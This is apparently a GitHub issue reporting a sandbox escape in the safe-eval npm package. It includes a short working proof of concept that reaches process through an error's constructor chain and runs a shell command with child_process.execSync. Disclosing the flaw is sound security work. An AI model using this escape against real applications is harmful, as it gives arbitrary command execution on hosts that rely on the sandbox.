Sandbox Escape Bug

// node version: 19.8.1 // safe-eval version: 0.4.1 var safeEval = require('safe-eval') let code = ` (function() {   try{  __defineGetter__("x", );   } catch(ret){  ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');  }} )() ` safeEval(code);

Sandbox can be escaped by prototype pollution by calling __defineGetter__ function.
Also, we can execute arbitrary shell code using process module.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Sandbox Escape Bug #32

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Sandbox Escape Bug #32

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions